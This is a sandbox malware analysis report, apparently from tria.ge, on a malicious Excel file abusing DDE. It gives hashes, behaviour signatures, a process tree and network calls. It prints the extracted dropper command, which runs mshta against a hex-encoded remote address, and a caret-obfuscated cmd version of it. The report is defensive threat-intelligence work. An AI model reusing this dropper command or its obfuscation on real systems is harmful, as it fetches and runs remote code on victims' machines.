Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

02db686e0d...bb.xls

windows7-x64

10

02db686e0d...bb.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 00:27 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02db686e0df1d12f25da7e841b48d47d6cdcd52e4c7f68b48155265b19020ebb.xls

  • Size

    107KB

  • MD5

    fd86ecc9240f42bf24010b822344b210

  • SHA1

    390dd835d292fff13d2ade930c4704c242846ec4

  • SHA256

    02db686e0df1d12f25da7e841b48d47d6cdcd52e4c7f68b48155265b19020ebb

  • SHA512

    cade3602a81a1d7a50851eb70e422b16aba28bd1cc5868668e3a98c4653288b71a21a0ba8ac8cf0a878ed562c3907d73bf2f70b2c25de679839dc31865743adc

  • SSDEEP

    3072:+C+nBqmxk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIFxe53lGvFTQ3IzxgdrvxpU0O:R+nBqmxk3hbdlylKsgqopeJBWhZFVE+s

Score
10/10
discovery

Malware Config

Extracted

Language
hta
Source
1
mshta http://0xb907d607/fer/fe4.html
URLs
hta.dropper

http://185.7.214.7/fer/fe4.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\02db686e0df1d12f25da7e841b48d47d6cdcd52e4c7f68b48155265b19020ebb.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/f^e4.h^tm^l
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe4.html
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2884

Network

    No results found
  • 185.7.214.7:80
    mshta.exe
    152 B
     3
  • 185.7.214.7:80
    mshta.exe
    152 B
     3
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2828-1-0x00000000720DD000-0x00000000720E8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2828-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2828-2-0x00000000720DD000-0x00000000720E8000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.